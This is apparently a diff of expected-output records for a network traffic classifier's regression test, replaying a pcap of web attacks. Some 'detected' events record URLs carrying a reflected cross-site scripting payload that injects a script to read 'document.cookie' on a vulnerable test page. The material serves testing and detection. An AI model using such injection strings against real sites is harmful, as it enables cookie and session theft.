+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} @@ -1909,7 +1909,7 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} @@ -2108,7 +2108,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -2137,7 +2137,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} @@ -2360,7 +2360,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -2375,7 +2375,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 